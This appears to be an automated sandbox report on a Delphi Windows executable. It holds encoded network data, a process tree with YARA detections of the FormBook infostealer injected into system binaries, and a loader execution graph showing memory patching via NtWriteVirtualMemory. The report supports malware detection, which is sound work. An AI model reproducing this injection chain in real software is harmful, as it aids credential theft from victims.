                                                                                                                                        2024-10-23 05:02:17 UTC16384INData Raw: 38 65 41 44 72 69 4d 41 52 43 4c 4f 5a 54 6a 68 77 36 6e 6d 4f 77 59 34 6b 76 6a 44 51 6e 75 32 35 4b 68 75 6d 67 62 58 32 71 50 52 39 35 62 34 6c 62 32 38 62 71 30 47 50 45 45 34 31 78 5a 45 4c 31 58 69 43 39 36 69 5a 67 77 59 46 34 54 64 36 54 61 33 76 70 41 66 69 6a 30 4a 54 36 33 75 6c 5a 4f 47 42 71 42 63 38 35 7a 6d 6a 39 57 53 65 4d 54 4e 34 36 47 47 6a 44 4f 48 69 54 61 42 38 33 59 5a 72 37 39 61 66 62 45 66 74 42 51 71 64 6e 4c 75 55 47 64 78 6b 4b 47 59 30 43 2b 4f 37 4a 65 58 4d 69 6f 58 72 39 44 76 6e 42 78 4e 74 32 6e 79 72 46 42 58 68 2f 76 55 4f 55 2b 6f 73 64 4b 73 58 45 43 49 32 6e 69 42 64 38 47 46 35 75 6d 6b 6b 50 6d 48 68 73 48 72 51 6c 59 53 6b 59 76 76 5a 78 34 41 53 2f 68 4f 77 77 56 6b 78 34 46 6a 44 46 52 70 61 67 58 36 53 69 45
                                                                                                                                        Data Ascii: 8eADriMARCLOZTjhw6nmOwY4kvjDQnu25KhumgbX2qPR95b4lb28bq0GPEE41xZEL1XiC96iZgwYF4Td6Ta3vpAfij0JT63ulZOGBqBc85zmj9WSeMTN46GGjDOHiTaB83YZr79afbEftBQqdnLuUGdxkKGY0C+O7JeXMioXr9DvnBxNt2nyrFBXh/vUOU+osdKsXECI2niBd8GF5umkkPmHhsHrQlYSkYvvZx4AS/hOwwVkx4FjDFRpagX6SiE
                                                                                                                                        2024-10-23 05:02:17 UTC1024INData Raw: 59 4d 58 70 67 44 64 66 6a 4b 68 73 42 63 43 4d 6c 52 54 69 2f 64 63 4b 78 51 2b 69 52 4d 69 2b 4f 2b 68 76 69 4e 73 58 36 6d 4c 69 51 52 33 65 31 59 2b 58 6c 48 4c 65 6e 57 70 52 44 37 42 35 45 61 5a 4c 39 53 2b 4b 47 4f 7a 43 7a 61 34 79 37 64 71 34 33 5a 68 58 48 4c 66 57 4c 71 41 39 48 56 73 76 43 4e 56 46 75 71 43 71 53 2b 64 49 50 37 49 53 46 63 50 4c 42 33 65 43 6b 54 6c 32 5a 47 61 73 53 6b 69 64 62 62 54 7a 44 59 42 71 65 78 51 50 4c 4a 73 4b 4c 4a 36 6c 77 78 55 62 6d 6b 6c 54 55 35 55 30 4a 63 44 42 6f 6d 33 7a 78 41 72 49 42 47 76 73 47 46 2f 7a 44 75 4b 4e 61 33 6c 6b 42 37 2b 6f 68 52 69 63 4b 7a 32 6e 39 6d 5a 72 77 61 42 71 39 72 74 33 66 38 56 52 4f 31 6c 62 30 2f 4c 38 62 42 4b 42 4f 2f 63 30 55 68 78 64 56 58 50 39 39 6e 48 34 70 4e 48
                                                                                                                                        Data Ascii: YMXpgDdfjKhsBcCMlRTi/dcKxQ+iRMi+O+hviNsX6mLiQR3e1Y+XlHLenWpRD7B5EaZL9S+KGOzCza4y7dq43ZhXHLfWLqA9HVsvCNVFuqCqS+dIP7ISFcPLB3eCkTl2ZGasSkidbbTzDYBqexQPLJsKLJ6lwxUbmklTU5U0JcDBom3zxArIBGvsGF/zDuKNa3lkB7+ohRicKz2n9mZrwaBq9rt3f8VRO1lb0/L8bBKBO/c0UhxdVXP99nH4pNH
                                                                                                                                        2024-10-23 05:02:17 UTC16384INData Raw: 76 37 75 4e 68 45 61 4a 66 49 32 76 51 32 4e 49 45 64 38 69 4c 4b 2b 4e 56 32 75 63 45 75 5a 6f 6d 6a 57 32 55 45 41 37 67 2b 47 36 61 6f 6b 6b 66 4c 57 69 32 61 30 33 2f 4b 32 6b 43 4e 76 54 63 64 66 51 72 4d 56 6a 68 56 62 67 65 50 6d 31 30 6c 48 66 35 53 52 53 4c 6f 67 73 4c 2f 43 2b 2f 52 46 47 79 7a 71 77 6a 78 7a 70 4f 55 46 41 37 58 54 4e 5a 48 30 57 79 4d 6e 48 55 67 7a 4c 31 5a 74 6a 6a 54 33 43 78 77 35 4e 68 75 67 64 71 62 6b 45 6d 6f 72 4c 31 4e 59 67 4f 45 4c 6f 44 61 34 39 33 6d 45 41 46 51 2b 42 5a 48 47 53 38 79 47 61 47 64 6e 67 36 54 4f 6b 7a 30 7a 61 37 51 63 37 34 63 53 73 2b 62 46 48 6f 50 64 64 74 58 63 75 73 5a 69 32 77 37 4e 4a 33 2b 4b 46 51 30 35 33 6d 54 54 4a 74 31 51 67 49 36 64 33 5a 65 6c 78 36 63 71 6e 7a 67 2b 6a 45 64 4e
                                                                                                                                        Data Ascii: v7uNhEaJfI2vQ2NIEd8iLK+NV2ucEuZomjW2UEA7g+G6aokkfLWi2a03/K2kCNvTcdfQrMVjhVbgePm10lHf5SRSLogsL/C+/RFGyzqwjxzpOUFA7XTNZH0WyMnHUgzL1ZtjjT3Cxw5NhugdqbkEmorL1NYgOELoDa493mEAFQ+BZHGS8yGaGdng6TOkz0za7Qc74cSs+bFHoPddtXcusZi2w7NJ3+KFQ053mTTJt1QgI6d3Zelx6cqnzg+jEdN
                                                                                                                                        2024-10-23 05:02:17 UTC1024INData Raw: 77 4b 54 67 4b 44 78 68 39 56 35 71 70 6d 61 67 6e 69 33 64 6c 72 66 75 76 6b 33 68 48 41 48 79 53 43 6a 6e 6b 2b 57 6c 46 63 36 67 66 66 32 62 70 64 48 37 58 6e 63 4d 55 38 54 43 53 48 54 6d 6c 65 78 4a 77 65 6a 67 38 55 72 61 4d 35 56 46 79 6c 33 35 67 62 75 37 56 6a 55 64 6d 43 5a 78 4e 34 6f 6a 38 42 4d 6d 42 52 66 31 50 59 56 2b 6b 79 4d 75 70 56 51 6d 49 46 48 46 33 71 54 57 6a 66 43 70 73 68 37 47 34 56 56 4c 59 72 47 42 36 2b 2f 6c 5a 71 38 37 4c 7a 2f 57 68 39 32 5a 34 56 52 43 50 75 32 54 56 6f 66 71 56 78 54 53 57 78 70 2b 53 38 77 61 7a 4c 2f 6d 39 46 4e 50 4a 52 44 79 4e 4a 50 31 5a 34 36 37 65 78 6f 51 71 74 4e 62 73 58 51 42 41 51 73 63 34 2f 67 72 46 53 30 75 55 37 79 53 54 6d 34 49 78 4e 48 35 74 2f 39 57 75 6c 6d 2b 36 2b 4c 53 6f 73 49
                                                                                                                                        Data Ascii: wKTgKDxh9V5qpmagni3dlrfuvk3hHAHySCjnk+WlFc6gff2bpdH7XncMU8TCSHTmlexJwejg8UraM5VFyl35gbu7VjUdmCZxN4oj8BMmBRf1PYV+kyMupVQmIFHF3qTWjfCpsh7G4VVLYrGB6+/lZq87Lz/Wh92Z4VRCPu2TVofqVxTSWxp+S8wazL/m9FNPJRDyNJP1Z467exoQqtNbsXQBAQsc4/grFS0uU7ySTm4IxNH5t/9Wulm+6+LSosI
                                                                                                                                        2024-10-23 05:02:17 UTC16384INData Raw: 32 2f 41 74 5a 52 54 76 4e 73 78 48 68 35 50 68 30 6a 6a 6f 53 43 61 36 6d 4d 4a 32 6b 2f 6f 6b 43 65 34 4c 54 55 58 42 54 6a 51 68 78 47 62 43 66 51 79 49 54 52 64 74 45 5a 69 51 71 6d 6a 38 2f 44 41 52 72 77 53 54 33 75 41 6c 41 74 76 46 57 54 79 6c 37 32 51 41 35 4b 31 56 74 48 63 45 53 34 6e 39 38 75 6d 50 30 56 6f 6d 65 74 4e 51 32 5a 31 6f 54 4a 77 58 44 62 6f 4f 2f 55 69 74 70 59 54 47 72 57 74 4e 37 76 6f 45 6d 54 41 6c 39 35 35 69 4c 57 6e 53 70 6b 43 41 4b 71 48 74 6d 79 4b 69 50 56 70 68 39 4f 69 76 6d 32 52 6e 62 79 38 47 45 62 37 70 4a 50 74 79 31 64 45 4a 31 4d 5a 4b 67 42 66 37 79 33 4c 34 38 32 6f 65 4b 38 70 75 5a 34 78 59 64 68 78 63 44 2f 54 62 30 57 37 6a 7a 32 64 6e 64 4a 6a 72 4b 6a 6c 4f 68 2b 43 2b 75 42 4b 44 70 7a 57 51 70 65 68
                                                                                                                                        Data Ascii: 2/AtZRTvNsxHh5Ph0jjoSCa6mMJ2k/okCe4LTUXBTjQhxGbCfQyITRdtEZiQqmj8/DARrwST3uAlAtvFWTyl72QA5K1VtHcES4n98umP0VometNQ2Z1oTJwXDboO/UitpYTGrWtN7voEmTAl955iLWnSpkCAKqHtmyKiPVph9Oivm2Rnby8GEb7pJPty1dEJ1MZKgBf7y3L482oeK8puZ4xYdhxcD/Tb0W7jz2dndJjrKjlOh+C+uBKDpzWQpeh
                                                                                                                                        2024-10-23 05:02:17 UTC1024INData Raw: 64 6f 57 53 32 62 58 43 51 34 2b 68 62 4d 6b 45 58 70 52 67 65 59 76 57 52 37 6a 62 37 45 6b 37 4a 58 7a 70 47 79 6c 74 6a 44 56 39 2b 35 74 4d 51 56 59 66 63 36 6f 45 79 36 72 76 76 47 36 4a 53 52 66 74 4f 66 58 58 32 31 63 59 78 79 39 35 51 6c 75 48 53 76 79 58 4f 70 53 6b 68 6c 6f 59 69 55 63 4b 62 48 62 35 47 2b 52 51 63 74 77 5a 49 39 4d 63 5a 78 7a 68 4e 45 49 41 44 70 4c 55 45 52 6f 68 31 6a 2f 53 2f 47 66 56 4c 77 4d 71 2b 2b 5a 48 74 51 4a 36 38 65 7a 77 47 55 74 78 48 43 6f 4e 4d 34 67 6a 42 67 43 4f 61 35 63 52 36 72 33 73 75 49 43 6c 4b 32 70 65 6f 75 42 50 50 70 69 44 63 34 66 56 7a 74 38 35 59 75 70 7a 58 64 6a 65 6a 6d 46 58 67 6b 63 71 66 30 45 46 4b 62 78 30 72 48 44 48 57 35 55 75 67 35 41 4c 31 5a 4b 7a 50 67 58 6a 67 2f 47 4c 38 71 52
                                                                                                                                        Data Ascii: doWS2bXCQ4+hbMkEXpRgeYvWR7jb7Ek7JXzpGyltjDV9+5tMQVYfc6oEy6rvvG6JSRftOfXX21cYxy95QluHSvyXOpSkhloYiUcKbHb5G+RQctwZI9McZxzhNEIADpLUERoh1j/S/GfVLwMq++ZHtQJ68ezwGUtxHCoNM4gjBgCOa5cR6r3suIClK2peouBPPpiDc4fVzt85YupzXdjejmFXgkcqf0EFKbx0rHDHW5Uug5AL1ZKzPgXjg/GL8qR


                                                                                                                                        Statistics

                                                                                                                                        CPU Usage

                                                                                                                                        Click to jump to process

                                                                                                                                        Memory Usage

                                                                                                                                        Click to jump to process

                                                                                                                                        High Level Behavior Distribution

                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                        Behavior

                                                                                                                                        Click to jump to process

                                                                                                                                        System Behavior

                                                                                                                                        General

                                                                                                                                        Target ID:0
                                                                                                                                        Start time:01:02:06
                                                                                                                                        Start date:23/10/2024
                                                                                                                                        Path:C:\Users\user\Desktop\z10982283782.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:"C:\Users\user\Desktop\z10982283782.exe"
                                                                                                                                        Imagebase:0x400000
                                                                                                                                        File size:1'114'112 bytes
                                                                                                                                        MD5 hash:3138EDFDC34F754C5F31088F00AE239D
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:Borland Delphi
                                                                                                                                        Reputation:low
                                                                                                                                        Has exited:true

                                                                                                                                        General

                                                                                                                                        Target ID:10
                                                                                                                                        Start time:01:02:17
                                                                                                                                        Start date:23/10/2024
                                                                                                                                        Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:C:\Windows\System32\colorcpl.exe
                                                                                                                                        Imagebase:0x450000
                                                                                                                                        File size:86'528 bytes
                                                                                                                                        MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.1523878243.0000000004A20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.1523878243.0000000004A20000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.1523941389.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.1523941389.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.1539377405.0000000025240000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.1539377405.0000000025240000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                        Reputation:moderate
                                                                                                                                        Has exited:true

                                                                                                                                        General

                                                                                                                                        Target ID:12
                                                                                                                                        Start time:01:02:27
                                                                                                                                        Start date:23/10/2024
                                                                                                                                        Path:C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:"C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe"
                                                                                                                                        Imagebase:0x4b0000
                                                                                                                                        File size:140'800 bytes
                                                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                        Has elevated privileges:false
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2492246864.0000000005060000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.2492246864.0000000005060000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                                        Reputation:high
                                                                                                                                        Has exited:false

                                                                                                                                        General

                                                                                                                                        Target ID:13
                                                                                                                                        Start time:01:02:29
                                                                                                                                        Start date:23/10/2024
                                                                                                                                        Path:C:\Windows\SysWOW64\takeown.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:"C:\Windows\SysWOW64\takeown.exe"
                                                                                                                                        Imagebase:0x1000000
                                                                                                                                        File size:51'712 bytes
                                                                                                                                        MD5 hash:A9AB2877AE82A53F5A387B045BF326A4
                                                                                                                                        Has elevated privileges:false
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.2488106328.0000000000670000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.2488106328.0000000000670000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.2491687518.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.2491687518.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.2491841213.0000000000B80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.2491841213.0000000000B80000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                        Reputation:moderate
                                                                                                                                        Has exited:false

                                                                                                                                        General

                                                                                                                                        Target ID:14
                                                                                                                                        Start time:02:04:54
                                                                                                                                        Start date:23/10/2024
                                                                                                                                        Path:C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:"C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe"
                                                                                                                                        Imagebase:0x4b0000
                                                                                                                                        File size:140'800 bytes
                                                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                        Has elevated privileges:false
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.2494174819.0000000004C40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.2494174819.0000000004C40000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                        Reputation:high
                                                                                                                                        Has exited:false

                                                                                                                                        General

                                                                                                                                        Target ID:17
                                                                                                                                        Start time:02:05:07
                                                                                                                                        Start date:23/10/2024
                                                                                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                        Imagebase:0x7ff722870000
                                                                                                                                        File size:676'768 bytes
                                                                                                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                        Has elevated privileges:false
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high
                                                                                                                                        Has exited:true

                                                                                                                                        Disassembly

                                                                                                                                        Reset < >

                                                                                                                                          Execution Graph

                                                                                                                                          Execution Coverage:11.2%
                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                          Signature Coverage:10.7%
                                                                                                                                          Total number of Nodes:289
                                                                                                                                          Total number of Limit Nodes:15
                                                                                                                                          execution_graph 32346 2ab8128 32981 2a94860 32346->32981 32982 2a94871 32981->32982 32983 2a948ae 32982->32983 32984 2a94897 32982->32984 32999 2a945a0 32983->32999 32990 2a94bcc 32984->32990 32987 2a948df 32988 2a948a4 32988->32987 33004 2a94530 32988->33004 32991 2a94bd9 32990->32991 32998 2a94c09 32990->32998 32993 2a94c02 32991->32993 32994 2a94be5 32991->32994 32995 2a945a0 11 API calls 32993->32995 33010 2a92c44 11 API calls 32994->33010 32995->32998 32996 2a94bf3 32996->32988 33011 2a944dc 32998->33011 33000 2a945c8 32999->33000 33001 2a945a4 32999->33001 33000->32988 33016 2a92c10 11 API calls 33001->33016 33003 2a945b1 33003->32988 33005 2a94534 33004->33005 33006 2a94544 33004->33006 33005->33006 33008 2a945a0 11 API calls 33005->33008 33007 2a94572 33006->33007 33017 2a92c2c 11 API calls 33006->33017 33007->32987 33008->33006 33010->32996 33012 2a944fd 33011->33012 33013 2a944e2 33011->33013 33012->32996 33013->33012 33015 2a92c2c 11 API calls 33013->33015 33015->33012 33016->33003 33017->33007 33018 2a91c6c 33019 2a91c7c 33018->33019 33020 2a91d04 33018->33020 33021 2a91c89 33019->33021 33022 2a91cc0 33019->33022 33023 2a91f58 33020->33023 33024 2a91d0d 33020->33024 33025 2a91c94 33021->33025 33066 2a91724 33021->33066 33028 2a91724 10 API calls 33022->33028 33026 2a91fec 33023->33026 33030 2a91f68 33023->33030 33031 2a91fac 33023->33031 33027 2a91d25 33024->33027 33041 2a91e24 33024->33041 33033 2a91d2c 33027->33033 33038 2a91d48 33027->33038 33042 2a91dfc 33027->33042 33047 2a91cd7 33028->33047 33036 2a91724 10 API calls 33030->33036 33035 2a91fb2 33031->33035 33039 2a91724 10 API calls 33031->33039 33032 2a91e7c 33037 2a91724 10 API calls 33032->33037 33055 2a91e95 33032->33055 33034 2a91cfd 33054 2a91f82 33036->33054 33051 2a91f2c 33037->33051 33045 2a91d79 Sleep 33038->33045 33058 2a91d9c 33038->33058 33057 2a91fc1 33039->33057 33040 2a91cb9 33041->33032 33044 2a91e55 Sleep 33041->33044 33041->33055 33046 2a91724 10 API calls 33042->33046 33043 2a91fa7 33044->33032 33048 2a91e6f Sleep 33044->33048 33049 2a91d91 Sleep 33045->33049 33045->33058 33060 2a91e05 33046->33060 33047->33034 33053 2a91a8c 8 API calls 33047->33053 33048->33041 33049->33038 33050 2a91ca1 33050->33040 33090 2a91a8c 33050->33090 33051->33055 33059 2a91a8c 8 API calls 33051->33059 33052 2a91e1d 33053->33034 33054->33043 33061 2a91a8c 8 API calls 33054->33061 33057->33043 33064 2a91a8c 8 API calls 33057->33064 33062 2a91f50 33059->33062 33060->33052 33063 2a91a8c 8 API calls 33060->33063 33061->33043 33063->33052 33065 2a91fe4 33064->33065 33067 2a91968 33066->33067 33068 2a9173c 33066->33068 33069 2a91a80 33067->33069 33070 2a91938 33067->33070 33077 2a9174e 33068->33077 33081 2a917cb Sleep 33068->33081 33072 2a91a89 33069->33072 33073 2a91684 VirtualAlloc 33069->33073 33074 2a91947 Sleep 33070->33074 33082 2a91986 33070->33082 33071 2a9175d 33071->33050 33072->33050 33075 2a916bf 33073->33075 33076 2a916af 33073->33076 33079 2a9195d Sleep 33074->33079 33074->33082 33075->33050 33107 2a91644 33076->33107 33077->33071 33078 2a9182c 33077->33078 33083 2a9180a Sleep 33077->33083 33089 2a91838 33078->33089 33113 2a915cc 33078->33113 33079->33070 33081->33077 33084 2a917e4 Sleep 33081->33084 33085 2a915cc VirtualAlloc 33082->33085 33088 2a919a4 33082->33088 33083->33078 33086 2a91820 Sleep 33083->33086 33084->33068 33085->33088 33086->33077 33088->33050 33089->33050 33091 2a91b6c 33090->33091 33092 2a91aa1 33090->33092 33094 2a916e8 33091->33094 33097 2a91aa7 33091->33097 33096 2a91b13 Sleep 33092->33096 33092->33097 33093 2a91ab0 33093->33040 33095 2a91c66 33094->33095 33100 2a91644 2 API calls 33094->33100 33095->33040 33096->33097 33098 2a91b2d Sleep 33096->33098 33097->33093 33099 2a91b4b Sleep 33097->33099 33103 2a91b81 33097->33103 33098->33092 33101 2a91b61 Sleep 33099->33101 33099->33103 33102 2a916f5 VirtualFree 33100->33102 33101->33097 33104 2a9170d 33102->33104 33105 2a91c00 VirtualFree 33103->33105 33106 2a91ba4 33103->33106 33104->33040 33105->33040 33106->33040 33108 2a91681 33107->33108 33109 2a9164d 33107->33109 33108->33075 33109->33108 33110 2a9164f Sleep 33109->33110 33111 2a91664 33110->33111 33111->33108 33112 2a91668 Sleep 33111->33112 33112->33109 33117 2a91560 33113->33117 33115 2a915d4 VirtualAlloc 33116 2a915eb 33115->33116 33116->33089 33118 2a91500 33117->33118 33118->33115 33119 2abd2fc 33129 2a9656c 33119->33129 33123 2abd32a 33134 2abc35c timeSetEvent 33123->33134 33125 2abd334 33126 2abd342 GetMessageA 33125->33126 33127 2abd352 33126->33127 33128 2abd336 TranslateMessage DispatchMessageA 33126->33128 33128->33126 33130 2a96577 33129->33130 33135 2a94198 33130->33135 33133 2a942ac SysFreeString SysReAllocStringLen SysAllocStringLen 33133->33123 33134->33125 33136 2a941de 33135->33136 33137 2a94257 33136->33137 33138 2a943e8 33136->33138 33149 2a94130 33137->33149 33140 2a94419 33138->33140 33144 2a9442a 33138->33144 33154 2a9435c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 33140->33154 33143 2a94423 33143->33144 33145 2a9446f FreeLibrary 33144->33145 33146 2a94493 33144->33146 33145->33144 33147 2a9449c 33146->33147 33148 2a944a2 ExitProcess 33146->33148 33147->33148 33150 2a94173 33149->33150 33151 2a94140 33149->33151 33150->33133 33151->33150 33153 2a915cc VirtualAlloc 33151->33153 33155 2a95868 33151->33155 33153->33151 33154->33143 33156 2a95878 GetModuleFileNameA 33155->33156 33157 2a95894 33155->33157 33159 2a95acc GetModuleFileNameA RegOpenKeyExA 33156->33159 33157->33151 33160 2a95b4f 33159->33160 33161 2a95b0f RegOpenKeyExA 33159->33161 33177 2a95908 12 API calls 33160->33177 33161->33160 33163 2a95b2d RegOpenKeyExA 33161->33163 33163->33160 33164 2a95bd8 lstrcpynA GetThreadLocale GetLocaleInfoA 33163->33164 33167 2a95cf2 33164->33167 33171 2a95c0f 33164->33171 33165 2a95b74 RegQueryValueExA 33166 2a95b94 RegQueryValueExA 33165->33166 33168 2a95bb2 RegCloseKey 33165->33168 33166->33168 33167->33157 33168->33157 33170 2a95c1f lstrlenA 33172 2a95c37 33170->33172 33171->33167 33171->33170 33172->33167 33173 2a95c5c lstrcpynA LoadLibraryExA 33172->33173 33174 2a95c84 33172->33174 33173->33174 33174->33167 33175 2a95c8e lstrcpynA LoadLibraryExA 33174->33175 33175->33167 33176 2a95cc0 lstrcpynA LoadLibraryExA 33175->33176 33176->33167 33177->33165 33178 2abc350 33181 2aaf7c8 33178->33181 33182 2aaf7d0 33181->33182 33182->33182 33183 2aaf7d7 33182->33183 35607 2aa88b8 LoadLibraryW 33183->35607 33185 2aaf7f1 35612 2a92ee0 QueryPerformanceCounter 33185->35612 33187 2aaf7f6 33188 2aaf800 InetIsOffline 33187->33188 33189 2aaf80a 33188->33189 33190 2aaf81b 33188->33190 33191 2a94530 11 API calls 33189->33191 33192 2a94530 11 API calls 33190->33192 33193 2aaf819 33191->33193 33192->33193 33194 2a94860 11 API calls 33193->33194 33195 2aaf848 33194->33195 33196 2aaf850 33195->33196 33197 2aaf85a 33196->33197 35615 2a947ec 33197->35615 33199 2aaf873 33200 2aaf87b 33199->33200 33201 2aaf885 33200->33201 35630 2aa89d0 33201->35630 33204 2a94860 11 API calls 33205 2aaf8ac 33204->33205 33206 2aaf8b4 33205->33206 33207 2aaf8be 33206->33207 33208 2a947ec 11 API calls 33207->33208 33209 2aaf8d7 33208->33209 33210 2aaf8df 33209->33210 33211 2aaf8e9 33210->33211 33212 2aa89d0 20 API calls 33211->33212 33213 2aaf8f2 33212->33213 33214 2a94860 11 API calls 33213->33214 33215 2aaf910 33214->33215 33216 2aaf918 33215->33216 35643 2a946d4 33216->35643 35645 2aa8274 35607->35645 35609 2aa88f1 35656 2aa7d78 35609->35656 35613 2a92ef8 GetTickCount 35612->35613 35614 2a92eed 35612->35614 35613->33187 35614->33187 35616 2a94851 35615->35616 35617 2a947f0 35615->35617 35618 2a947f8 35617->35618 35619 2a94530 35617->35619 35618->35616 35620 2a94807 35618->35620 35623 2a94530 11 API calls 35618->35623 35622 2a945a0 11 API calls 35619->35622 35625 2a94544 35619->35625 35624 2a945a0 11 API calls 35620->35624 35621 2a94572 35621->33199 35622->35625 35623->35620 35627 2a94821 35624->35627 35625->35621 35693 2a92c2c 11 API calls 35625->35693 35628 2a94530 11 API calls 35627->35628 35629 2a9484d 35628->35629 35629->33199 35631 2aa89e4 35630->35631 35632 2aa81cc 17 API calls 35631->35632 35633 2aa8a1d 35632->35633 35634 2aa8274 15 API calls 35633->35634 35635 2aa8a36 35634->35635 35636 2aa7d78 18 API calls 35635->35636 35637 2aa8a95 35636->35637 35694 2aa8338 35637->35694 35640 2aa8abc 35641 2a94500 11 API calls 35640->35641 35642 2aa8ac9 35641->35642 35642->33204 35644 2a946da 35643->35644 35646 2a94530 11 API calls 35645->35646 35647 2aa8299 35646->35647 35670 2aa798c 35647->35670 35650 2a947ec 11 API calls 35651 2aa82b3 35650->35651 35652 2aa82bb GetModuleHandleW GetProcAddress GetProcAddress 35651->35652 35653 2aa82ee 35652->35653 35676 2a94500 35653->35676 35657 2a94530 11 API calls 35656->35657 35658 2aa7d9d 35657->35658 35659 2aa798c 12 API calls 35658->35659 35660 2aa7daa 35659->35660 35661 2a947ec 11 API calls 35660->35661 35662 2aa7dba 35661->35662 35682 2aa81cc 35662->35682 35665 2aa8274 15 API calls 35666 2aa7dd3 NtWriteVirtualMemory 35665->35666 35667 2aa7dff 35666->35667 35668 2a94500 11 API calls 35667->35668 35669 2aa7e0c FreeLibrary 35668->35669 35669->33185 35671 2aa799d 35670->35671 35672 2a94bcc 11 API calls 35671->35672 35674 2aa79ad 35672->35674 35673 2aa7a19 35673->35650 35674->35673 35680 2a9babc CharNextA 35674->35680 35678 2a94506 35676->35678 35677 2a9452c 35677->35609 35678->35677 35681 2a92c2c 11 API calls 35678->35681 35680->35674 35681->35678 35683 2a94530 11 API calls 35682->35683 35684 2aa81ef 35683->35684 35685 2aa798c 12 API calls 35684->35685 35686 2aa81fc 35685->35686 35687 2aa8204 GetModuleHandleA 35686->35687 35688 2aa8274 15 API calls 35687->35688 35689 2aa8215 GetModuleHandleA 35688->35689 35690 2aa8233 35689->35690 35691 2a944dc 11 API calls 35690->35691 35692 2aa7dcd 35691->35692 35692->35665 35693->35621 35695 2a94530 11 API calls 35694->35695 35696 2aa835b 35695->35696 35697 2a94860 11 API calls 35696->35697 35698 2aa837a 35697->35698 35699 2aa81cc 17 API calls 35698->35699 35700 2aa838d 35699->35700 35701 2aa8274 15 API calls 35700->35701 35702 2aa8393 FlushInstructionCache 35701->35702 35703 2aa83b9 35702->35703 35704 2a944dc 11 API calls 35703->35704 35705 2aa83c1 FreeLibrary 35704->35705 35705->35640

